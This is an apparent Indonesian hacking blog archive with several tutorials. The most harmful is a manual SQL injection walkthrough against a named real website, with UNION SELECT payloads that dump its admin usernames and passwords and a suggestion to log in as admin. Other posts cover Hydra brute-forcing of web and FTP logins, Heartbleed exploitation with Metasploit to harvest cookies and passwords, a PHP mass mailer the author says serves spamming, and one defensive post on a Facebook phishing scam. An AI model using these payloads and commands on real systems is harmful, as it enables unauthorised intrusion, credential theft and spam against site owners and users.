Tampilkan postingan dengan label Hack. Tampilkan semua postingan
Tampilkan postingan dengan label Hack. Tampilkan semua postingan

Senin, 03 Agustus 2015

Hacking Website With SQL Injection (Manual)








Relate Search : Melihat isi database dengan teknik manual Sql Injection, Mencuri isi database, Sql Injection, Sqli, Dork Sqli, Cara hacking website dengan sql injection, google dork, dork terbaru.

Sql Injection adalah salah satu teknik hacking suatu website yang memanfaatkan bug Sql pada link dinamis, pada url tersebut attacker dapat memasukkan perintah Sql ke dalam statement Sql via input website. Banyak cara untuk melakukan Sql Injection seperti dengan tools SqlMap, Havij dll, tetapi pada tutorial kali ini saya akan menjelaskan tentang cara Sql Injection secara manual melalui addressbar.

Berikut Langkah-Langkahnya :

1. Siapkan target terlebih dahulu, ( Website yang vulnerable terhadap Sql injection ). Cara mencari nya kita dapat menggunakan Google Dork, untuk melihat google dork terbaru bisa lihat DISINI.
untuk definisi Google Dork dan list Google dork terbaru bisa lihat DISINI.

2. Setelah kita dapat targetnya , sekarang kita akan mulai periksa, apakah website tersebut vulnerable terhadap Sql injection, pada kali ini saya akan mengambil contoh dari website berikut :

http://www.firstgulf.com/search-details.php?id=59




3. Tambahkan Quote pada akhir URL. Contoh :

http://www.firstgulf.com/search-details.php?id=59'



4. Terlihat di atas bahwa terjadi Error Pada Sintax Sql website, hal tersebut menunjukkan website vulnerable terhadap Sql Injection. Setelah itu ganti Quote dengan order by <angka>-- untuk melihat berapa table yang di miliki oleh website.


contoh :
http://www.firstgulf.com/search-details.php?id=59 order by 20--  , kita akan mengetahui jumlah table website apabila dalam permintaan jumlah table tidak terjadi error.

seperti contoh sebelumnya yaitu
http://www.firstgulf.com/search-details.php?id=59 order by 20-- . dalam website target ternyata error, maka lanjutkan ke angka yang lebih bawah.
order by 15-- ( Terjadi Error )
order by 13-- ( Terjadi Error )
order by 11-- ( Tidak Terjadi Error ) #Karna pada angka 11 tidak terjadi Error maka lanjutkan ke angka yang lebih besar selanjutnya yaitu 12.

order by 12-- ( Terjadi Error ) # ternyata pada angka 12 terjadi error, maka bisa di pastikan bahwa website target memiliki jumlah table sebanyak 11.

Contoh Error Order Table :



Hosting Unlimited Indonesia


Contoh Order Table Tanpa Error :





5. Setelah di ketahui bahwa jumlah table ada 11, selanjutnya kita mencari angka akan menunjukkan isi databasenya nanti.tambahkan tanda"-" di awal angka 59, dan deretan angka 1 sampai 11 di akhirnya.

http://www.firstgulf.com/search-details.php?id=-59 union all select
1,2,3,4,5,6,7,8,9,10,11--

6. Dapat di lihat pada gambar di atas, Ketika semua angka di pilih pada perintah Sql = Union All select. pada halaman website target muncul segelintir angka yang posisinya tidak menentu, pada contoh kali ini terlihat angka 2, 3 dan 5. Karna angka 3 yang paling terlihat jelas, jadi kita akan menggunakan angka 3.

7. selanjutnya kita akan melihat versi dari Database Mysql Website target.
ganti angka tiga pada Url sebelumnya, dengan "version()" tanpa tanda kutip.


contoh : http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,version(),4,5,6,7,8,9,10,11--

ternyata setelah di lakukan perintah di atas, angka tiga berganti dengan versi dari database mysql target. dapat terlihat versi nya adalah 5.5.32 .
sebenernya ada versi 4.x.x , tapi pada versi tersebut cara ini tidaka akan berhasil karna untuk database versi 4.x.x , kita akan di hadapkan pada cara Blind Sql.




8.  Selanjutnya kita akan melihat isi daftar table yang ada pada website target .
tambah kan pada url sebelumya.


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--


9. Terlihat sudah daftar nama semua table website target. kita cari nama table yang hampir mirip atau memang tempat penyimpanan user dan password login website. pada contoh di sini, terlihat ada table yang bernama "admin", kita akan pilih itu untuk di lihat kolomnya. sebelum eksekusi ke pembedahan table "admin", kita harus merubah kata "admin" kedalam bentuk hexadesima, untuk melakukannya silahkan kunjungi DISINI.


 Ganti beberapa kata dalam url tadi :

http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e--

NB : kata database() di ganti dengan nama table "admin" yang sudah di jadikan hexadesimal, ditambah 0x di depannya jadi = 0x61646d696e .

10. Setelah langkah di atas selesai dan berhasil, kita akan melihat isi dari table "admin" yaitu beberapa kolom. berikut nama-nama kolom pada table "admin".

# id
# admin_name
# admin_login
# admin_password



11.  Setelah di dapati  semua nama kolom, sekarang waktunya untuk melihat isi dari kolom tersebut.

ketik :


http://www.firstgulf.com/search-details.php?id=-59 union all select 1,2,group_concat(id, 0x3a,admin_name,0x3a,admin_login,0x3a,admin_password,0x0d0a),4,5,6,7,8,9,10,11 from admin--

NB : 
0x3a adalah bentuk Hexadesimal dari ":" (colon)
0x0d0a adalah bentuk Hexadesimal dari <enter>


12. akhirnya sudah terlihat isi dari kolom "admin" , di situ sudah terpampang
 id:admin_name:admin_login:admin_password

13. Untuk pengembangan selanjutnya anda bisa melakukan login ke halaman admin atau hanya melakukan pentesting terhadap database.
apabila ingin melanjutkan login, silahkan cari halaman login dengan tools, adminfinder.py download DISINI.

berikut ScreenShot nya :




Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.



Membuat Mass Email Broadcaster dengan PHP Script

Assalamualaikum Wr Wb .

Email BroadCaster adalah teknik untuk mengirim pesan secara masal ke segala jenis email, teknik ini di gunakan untuk banyak hal, seperti publikasi acara, undangan, pengumuman, bahkan spaming. contoh teknik broadcast adalah broadcast message milik BlackBerryMesangger. Banyak orang memanfaatkan fitur ini sebagai Mempromosikan Penjualan, Produk. dll.

PHP Script memiliki Fitur untuk mengirim email , Bagaimana caranya?. dalam Bahasa pemrograman PHP, terdapat code mail(to, subject, message) , yang akan kita bahas selanjutnya.
Contoh Email Broadcaster sudah saya buat adalah berikut ini : bill.meximas.com

Screenshot direktori  :


pada contoh sebelumnya, apabila kita klik kirim, halaman otomatis akan di muat ke halaman baru, yaitu ke bill.meximas.com/mail/openfile.php , file openfile.php adalah file yang akan membaca file bill.txt pada direktori /mail/upload/bill.txt. isi dari file bill.txt adalah kumpulan email yang akan kita tuju nanti. apabila ingin mengirim ke email yang lain, kita harus menggantinya pada file tersebut.

Berikut tata cara pembuatan Email BroadCaster dengan PHP Script :

1. Buat akun web hosting dahulu, kalo sudah punya langsung masuk ke file manager atau upload via FTP.
NB : di harapkan web hosting nya sama, agar tidak ada kesulitan yang berarti. pada tutorial kali ini saya menggunakan hosting ini .

2. Sebelum ke langkah upload, silahkan anda download terlebih dahulu file berikut EmailBroadCaster.zip, setelah itu extract file nya. atau copy paste dari link berikut :
- openfile.php
- mail.php
- index.php

3. apabila semua file telah siap, waktunya kita upload file tersebut ke server. pada tutorial ini saya akan menggunakan file manager 1 yang ada pada fitur idhostinger .




4. setelah membuka file manager, silahkan buka folder upload,  Ganti isi file bill.txt dengan list email yang hendak di broadcast.



5. Apabila berhasil, akses web anda, lalu klik kirim. seperti pada gambar berikut :


 6. apabila berhasil sesuai langkah2 di atas. hasil pengiriman broadcast email akan seperti berikut.




Mau pasang iklan di blog?. klik Disini
Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Jumat, 10 Juli 2015

Mendisable Anti Addblock di Samehadaku.net



suka anime? pasti pernah download di situs samehadaku.net iya kan? :D :D , nah situs ini memiliki banyak anime, salah satunya adalah anime kesukaan saya yaitu onepiece. waktu saya mau download anime di situs ini, eh tiba2 ada notif "matikan addblock", saya mikir kq hebat banget ini halaman bisa tau kalo aku make addblock :o . dan akhirnya saya nyoba footprinting terhadap website ini, ternyata website ini adalah blog yang menggunakan script jquery untuk memberikan notifikasi "matikan addblock", segera setelah itu saya coba membuat script untuk menghilangkan notif tersebut, script ini saya kasih nama "anti anti addblock samehadaku.net " :D :D :D hahahaha langsung aja check langkah2nya :

1. buka halaman samehadaku.net yang mau di download animenya
2. apabila keluar notifikasi "hilangkan addblock", klik kanan "inspect element" 



3. buka tab console



4. ketikkan script berikut di console
jQuery(document).ready(function( $ ) { $("b").hide(5000)});
 NB : Text berwarna merah bisa di hilangkan kalau pengen cepet.

5. enter



daaan voilaa. :D

NB: tutorial ini hanya di gunakan untuk pendidikan semata

Kamis, 08 Januari 2015

Tutorial Hydra Part II ( Bruteforce Login Website )


Relate Search : Hydra, Cracking, Hacking, Bypass, Facebook, Twitter, Login, Website, Security, Terminal.

Bruteforce Login Website adalah suatu teknik dimana kita akan melakukan penetrasi dengan cara masuk ke dalam suatu website yang memiliki proteksi login, dengan cara ilegal yaitu melakukan penebakan user dan password secara masal. teknik bruteforce tidak hanya bisa di gunakan di website, tapi juga bisa di lakukan di lingkungan lain seperti login apps, login windows, login email dll.

pada tutorial kali ini saya akan melanjutkan sesi dari tutorial hydra. dan sekarang sudah mencapai part II, dengan judul " bruteforcing login website" , pada tutorial hydra part I saya menggunakan mode GUI untuk melakukan cracking, tapi untuk sekarang saya akan menggunakan versi Consolenya. teknik ini memanfaatkan Bug method GET yang di miliki website, pada praktiknya nanti saya akan menggunakan website yang saya buat sendiri, jadi dan menggunakan localhost sebagai servernya. tutorial ini bisa di terapkan dan di kembangkan untuk website-website yang lebih terkenal seperti facebook, twitter, pinterest dll. tapi  harus tetap menggunakan Etical hacking. dan jangan sampai merugikan orang lain atas nafsu hacking anda.

oke, tanpa basa basi lagi, langsung saja ke tutorialnya :

Hal-hal yang di butuhkan : 
- Terminal (Console Linux)
- Hydra
- Website Target ( Localhost )

1. buka terminal tekan alt+ctrl+t , atau dari menu linux , pilih terminal.
masuk ke akses root , ketik : sudo su, apabila anda menggunakan kali linux atau os penetrasi lainnya, bisa skip langkah ini.



2. check website yang akan menjadi tempat testing . saya menggunakan localhost yang memiliki login website yang saya buat sendiri.

 3. langkah selanjutnya adalah mencoba dan melihat hasil apabila login yang di lakukan salah.
























ingat baik-baik hasil login apabila ada kesalahan dalam username dan password.
pada contoh kali ini, hasil yang muncul adalah "Login gagal"  seperti pada gambar di bawah ini.


4. siapkan wordlist yang berisi email dan password. akan lebih memudahkan apabila anda sudah mengatahui email target, jadi anda tinggal menyertakan wordlist password dari akun target. berikut saya menggunakan wordlist yang berisi email saya sendiri, saya simpan dengan nama user.txt.



berikut  wordlist password yang berisi kata random, yang saya simpan dengan nama pass.txt :



5. setelah perlengkapan siap semua, sekarang waktunya melakukan eksekusi, ketikkan perintah :

hydra -L user.txt -P pass.txt 127.0.0.1 http-get-form "/login.php:username=^USER^&password=^PASS^&login=login:gagal"

 keterangan :

- biru : nama file worlist user dan pass yang udah di buat atau di download.
- merah : domain website atau ip website.
- hijau : nama metode yang di gunakan oleh website untuk proses login. untuk mengetahui metode ini bisa di lakukan inspect element pada form login website, seperti pada gambar di bawah ini.



pada gambar di atas bisa kita lihat 2 baris di bawah garis biru terdapat kata "method='GET'" yang menyebutkan bahwa form login ini menggunakan methode GET.

- orange : sub url yang ada pada waktu kesalahan login , yang di ubah sedikit. 


sub url yang awalnya : /login.php?username=bill&password=testing&login=login
- tanda tanya di ganti dengan titik dua
- username yang di inputkan sebelumnya di ganti dengan ^USER^
- password yang di inputkan sebelumnya di ganti dengan ^PASS^
- pada akhir sub url di tambah dengan "titik dua" di tambah kata yang ada pada kesalah login yaitu "gagal", hasilnya ":gagal"
hasil dari beberapa penggantian di atas adalah :

 "/login.php:username=^USER^&password=^PASS^&login=login:gagal"

jangan lupa di beri tanda kutip untuk sub urlnya




 6. setelah selesai di ketikkan di atas, maka lanjutkan dengan menekan ENTER.
tunggu prosesnya hingga selesai, lama tidak nya proses bruteforcing tergantung dari kerumitan user dan password target.


dapat di lihat di atas, bahwa proses bruteforcing telah selesai, dan mendapatkan hasil yaitu :

host: 127.0.0.1    login: bill@3xpl01t.com   password: testing

7. selanjutnya balik ke halaman login website, lalu ketikkan user dan password yang sudah di peroleh tadi.



VOILAAAA... login sukses.


teknik ini benar-benar powerfull, walaupun begitu tetep ada kelemahannya. bayangkan apabila teknik di atas di lakukan ke pada login website yang sebenarnya. selamat bereksperimen.

NOTE : 3xpl01t memberikan tawaran bagi pembaca yang ingin order membuat website, bisa order ke kami , untuk tata caranya bisa masuk ke link berikut. 

Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat. Wassalamualaikum Wr Wb

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Rabu, 10 Desember 2014

Tutorial Hydra Part I ( Cracking FTP Account Using GUI Mode )

Tutorial ini tentang cracking ftp password dengan Hydra.

Relate search :  hacking, cracking, backtrack, hydra, hydra -G, kali, linux, password, username, email, server, website, terminal.

Hydra adalah suatu tools yang di gunakan untuk melakukan bruteforcing kepada akun tertentu di suatu jaringan atau server, contohnya FTP dan SSH. hydra adalah tools opensource, dan sudah bisa di install di segala platform termasuk windows, linux dan mac. tools ini memiliki dua versi yaitu, versi GUI dan versi CLI, pada kali ini saya akan memberikan contoh menggunakan GUI Mode. untuk lebih jelasnya tetang keterangan dari Hydra , bisa lihat di website aslinya di sini https://www.thc.org/thc-hydra/

tutorial kali ini saya akan memberikan langkah-langkah untuk melakukan bruteforcing kepada akun FTP .
WARNING : Tutorial ini bermaksud untuk memberikan pengetahuan bagi para pemilik akun ftp agar tau dan bisa memproteksi akun miliknya agar tidak bisa di crack atau di retas. diharapkan bagi pembaca yang belum mengenal etical hacking, untuk mempelajari etical hacking terlebih dahulu.

berikut langkah-langkahnya :

1. Buka terminal , tekan ctrl+alt+T atau klik shortcut yang ada pada distro milik anda. sebelum melakukan cracking terhadap target, kita harus mengetahui apakah service FTP dan port target sedang aktif atau tidak. hal ini juga menjadi salah satu cara untuk para pemilik server , untuk tidak selalu mengaktifkan service FTP nya apabila tidak di butuhkan.

2. Ketik "nmap <host target atau ip server target>" seperti target berikut , saya menggunakan localhost sebagai target kali ini. maka saya ketik "nmap 127.0.0.1" seperti gambar di bawah ini.


3. dapat di lihat di atas, bahwa ternyata service ftp sedang berjalan di host 127.0.0.1 dengan port 21 (port default dari FTP).



4. selanjutnya ketik "xhydra" untuk membuka hydra versi GUI, maka hasilnya akan keluar Hydra seperti berikut :



5. pada tab target silahkan masukkan target pada textbox singgle target (apabila target cuma satu) pada target list masukkan file text berisi host target (apabila target lebih dari satu). pada contoh kali ini saya hanya memiliki 1 target yaitu localhost.
- masukkan nomer port yang aktif tadi, yaitu : 21
- pilih protocol yang menjadi target :  FTP
- centang "Be Verbose" agar, aksi yang di lakukan nanti akan memiliki history dan di tampilkan di layar.


6. pada tab PASSWORDS Masukkan username dan password di textbox username dan password ( apabila hanya mempunyai satu username dan password ), masukkan di texbox username list dan password list ( apabila mempunyai lebih dari satu username dan password ) , pada textbox ini kita masukkan wordlist kita yang sudah kita punya.
pada contoh kali ini, saya memasukkan wordlist bernama rockbrute.txt . seperti pada gambar berikut :


Maka hasilnya akan seperti berikut :
- centang " try login as password " dan " try empty login ".


7. setelah semua di lakukan, waktunya kita jalankan aksinya. klik tab start, lalu tekan tombol start untuk memulai. tunggu sampai  aksi selesai. lama aksi ini tergantung dengan kerumitan user dan password yang di punya oleh pemilik akun ftp. hal ini dapat di manfaatkan oleh para pengguna FTP agar mengenkripsi user dan password miliknya agar tidak mudah di retas .


8. apablia berhasil, maka hasilnya akan seperti ini :

Login dengan username :  nobody
password : lampp



9.  untuk memeriksa apakah user dan password nya benar, selanjutnya kita akan mencoba login ke akun ftpnya menggunakan filezilla. 

masukkan host : 127.0.0.1 
username : nobody 
password : lampp
port : 21

NB : semua yang di isikan , tergantung pada hasil dan target yang anda punya.


bisa di lihat di atas , bahwa koneksi ke ftp berhasil. dan saya dapat mengakses semua file yang ada di dalam server target.

NB : sebelah kiri adalah direktori local , sebelah kanan adalah direktori server.

Kamis, 13 November 2014

Spam Facebook Modus Terbaru 2014

Assalamualaikum Wr Wb, artikel ini berisikan tentang spam facebook yang marak pada bulan ini.


Spam adalah suatu barang elektronik atau digital yang berupa pengiriman pesan secara bertubi-tubi atau masive, pengirim pesan di namakan spammer, tindakan spam di namakan spamming. spamming memiliki banyak jenis dan bentuk, spam dapat dilakukan dengan cara mengirim pesan email, chating, jejaring sosial, posting dll.

pada zaman ini salah satu media penerima dan pengiriman pesan adalah jejaring sosial facebook, walaupun bukan hanya dalam pengiriman/penerima pesan, facebook juga bisa melakukan komunikasi dengan cara posting di timeline atau status. spamming  kepada pengguna jejaring sosial facebook sering di lakukan baik itu di untuk tindak kejahatan ataupun hanya untuk melakukan promosi suatu vendor atau produk, pada bulan ini saya banyak sekali menerima spam berupa posting di facebook yang menyertakan link berupa aplikasi yang ngakunya aplikasi dapat melihat atau mengungkap siapa saja yang sering melihat profile kita, setelah itu di sebarkan ke 50 teman kita. padahal itu semua adalah HOAX belaka, link yang di sugukan memang link aplikasi facebook tetapi aplikasi tersebut hanya di buat pancingan untuk melakukan pencurian EMAIL dan PASSWORD facebook. bagaimana kronologi jelasnya dan bagaimana cara mencegah teknik spamming ini? mari kita telusuri bersama-sama.

Kronologi spamming facebook : 

1. Teman kita yang telah terjangkit aplikasi spaming melakukan penandaan nama pada akun kita. seperti gambar berikut : 



pada gambari di atas terlihat akun dengan nama Rito Galih melakukan posting ke timeline saya dengan menandari 49 temannya, pada posting tersebut di sertakan link aplikasi untuk melihat 5 orang yang sering melihat profile nya, yang sebenarnya itu link untuk mengacaukan user yang tertarik untuuk di giring ke HALAMAN PHISING.

2. Apabila kita klik link yang di sertakan pada postingan tersebut , kita akan di alihkan ke halaman persetujuan memasuki aplikasi. contoh halamanya seperti berikut : 


halaman di atas adalah halaman persetujuan atau peringatan dari facebook yang meminta feeback dari pengguna akun untuk lanjut ke aplikasi. apabila aplikasi yang di tuju adalah aplikasi yang benar atau memang benar2 aplikasi, maka setelah kita kllik tombol GO TO APP , maka kita akan di alihkan ke halaman aplikasi, TETAPI pada  kali ini kita malah di alihkan ke halaman PHISING.

3. halaman phising : 



gambar di atas adalah halaman phising yang di tunjukan kepada pengguna akun, halaman ini seakan-akan membuat kita berfikir bahwa akun pengguna telah logout, padahal belum logout. apabila kita bisa lebih cermat lagi, kita bisa melihat di address bar, di sana tertulis link yang menampilkan halaman facebook bukan "www.facebook.com", tetapi "facula.zepto.org/home" bisa kita simpulkan di sini bahwa halaman yang di tampilkan adalah halaman PHISING yang bertujuan untuk MENCURI email dan password Facebook kita. apabila kita login maka kita akan di alihkan ke link aplikasi yang sebenarnya, walaupun kita login dengan email dan password yang SALAH kita akan tetap bisa MASUK. hal ini semakin memperkuat bahwa kita sebenarnya belum sama skali logout.

NB : saya mengisikan email : kurangkerjaan@hacker.com ,  padahal email saya bukan itu, tetapi saya tetap bisa login. :D


4. halaman aplikasi : 



setelah kita login pada halaman phising, kita akan di alihkan ke halaman aplikasi , pada halaman di atas aplikasi yang di tujukan kepada kita adalah "Deer Hunter 2014", aplikasi ini tidak bisa kita gunakan, karna hanya menampilkan halaman kosong pada interfacenya. :v


Kesimpulan :  

Spamming yang di lakukan oleh pelaku (hacker) bertujuan untuk menyebar link yang berisikan aplikasi pendukung PHISING, phising yang di lakukan hacker ini bertujuan untuk mengambil EMAIL dan PASSWORD pengguna akun yang telah login di halaman phising.



setelah kita mengetahui kronologi spamming sekaligus phising oleh hacker di atas, sekarang saat nya kita membahas tentang bagaimana cara mencegah agar kita tidak terjebak dan terjangkit oleh link spam tersebut.

langkah-langkahnya sebagai berikut :

1. buka menu settings facebook. 


2. pilih tab, "Time line and Tagging .



3. klik edit pada baris pertanyaan "who can add things to my time line?" , pilih pertanyaan nomer dua yang memiliki opsi status OFF.
klik edit, maka akan muncul pilihan "Enabled" atau "Disabled" , pilih opsi enabled



keterangan : 

Apabila kita mengaktifkan fitur di atas, maka setiap posting yang melakukan penandaan kepada akun kita akan di lakukan tahap persetujuan dulu, sebelum bisa melakukan penandaan.

Mau pasang iklan di blog?. klik Disini

Sekian artikel saya, Semoga Bermanfaat. Wassalamualaikum Wr Wb

Stay fools to Stay Hungry
NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.

Senin, 21 Juli 2014

POC HeartBleed With MetasploitFrameWork

peretasan sebuah website adalah salah satu kegemaran para hacker ataupun cracker, tujuannya apa?. banyak hal yang melatar belakangi seorang hacker melakukan peretasan. beberapa diantaranya adalah mendapatkan uang, karna sebuah gengsi, kesenangan pribadi dan atau pekerjaan. peretasan di definisikan sebagai cara atau kegiatan yang di lakukan untuk menyusupi suatu tempat (server) dari kesalahan sistem yang terdapat pada website. cara dan konsep dari peretasan website sangat banyak sekali, tergantung exploit atau bug yang ada pada website tersebut, contohnya yang paling umum dan sering di gunakan adalah Sql Injection, XSS, LFI, RFI, Temper Data. Semua cara tersebut sangat banyak terdapat di web dan blog-blog umum. bug tersebut juga masih ada website-website walaupun sudah lama. tapi kali ini saya tidak akan membahas salah satu dari beberapa teknik peretasan tersebut. beberapa waktu lalu, FBI di kagetkan oleh sebuah exploit yang memanfaatkan bug openSSL server namanya adalah HeartBleed, OpenSSL adalah Sebuah Protocol silahkan lihat definisi OpenSSL. banyak server yang menggunakan protocol Openssl terdapat bug ini, termasuk server Gmail.com . wow, bisa di bayangkan server perusahaan sebesar google, bisa di exploit dengan terdapatnya bug tersebut, tak heran serluruh perusahaan terkenal dan instansi kepemerintahan segera melakukan patch terhadap bug tersebut. tapi tidak semua server telah di patch, bug ini masih baru, dan masih banyak sekali server yang vulnerabel terhadap bug ini.

pada kali ini saya akan memberikan langkah-langkah POC (Proof Of Concept ) dari Exploit HeartBleed menggunakan Metasploit Frame Work, segera saja masuk langkah-langkahnya :


1. Cari website yang mau di periksa , apakah terdapat bug openssl nya.
gunakan file python berikut untuk memeriksanya. download filenya HeartBleed2.PY
2. Buka Terminal ctrl+alt+T ,Lihat IP website korban, ketik ping www.target.com , ternyata ketemu ipnya 127.0.0.1 (localhost)
3.  Masuk ke direktory dimana file heartbleed2.py .
Pada contoh berikut, file heartbleed.py saya simpan di direktory ~/Desktop/Hacking

Ketik cd ~/Desktop/Hacking lalu enter

3. ketik python heartbleed2.py 127.0.0.1
NB : - 127.0.0.1 hanya contoh, saya menyembunyikan link dan ip asli korban.
- warna merah adalah alamat website
- warna lime adalah ip website 


4. Dapat di lihat pada gambar di atas, terdapat kalimat ( WARNING: server returned more data than it should - server is vulnerable! )
kalimat tersebut menandakan bahwa server ternyata vulnerable terhadap bug openssl. setelah tau ternyata server vulnerable, slanjutnya kita buka MSFCONSOLE. 


5. ketik search heartbleed ,tunggu sampai library heartbleed kluar, apabila tidak ada. berarti MetasploitFrameWork anda masih belum uptodate. lebih baik di update dulu ketik msfupdate , tunggu hingga update selesai. dan lakukan mulai langkah 4.
apabila sudah terupdate, library heartbleed akan terlihat. seperti pada gambar di bawah ini. 






6. Pilih auxiliary/scanner/ssl/openssl_heartbleed , ketik use auxiliary/scanner/ssl/openssl_heartblee lalu Enter.

7. setelah itu ketik show options  untuk melihat apa saja value yang perlu di rubah.


8. dapat di lihat pada gambar di atas terdapat beberapa opsi, ada beberapa yang harus di ganti. yaitu RHOSTS dan verbose nya.
ketik set RHOSTS 127.0.0.1 
NB : ganti 127.0.0.1 dengan IP sesuai IP target yang anda dapat .
lalu ketik set verbose true 
9. setelah semua di set, sekarang waktunya eksekusi.

ketik run untuk menjalankan exploitnya.


10. apabila berhasil , anda akan di hadapkan pada code2 seperti cookie, user agent, dan user n password kalau kalian beruntung. inti dari exploit heartbleed adalah kalian akan mendapati pesan-pesan sensitif atau pribadi yang ada dalam server, yang bisa kalian gunakan untuk melakukan tindak hacking selanjutnya.

Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry

NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.



Search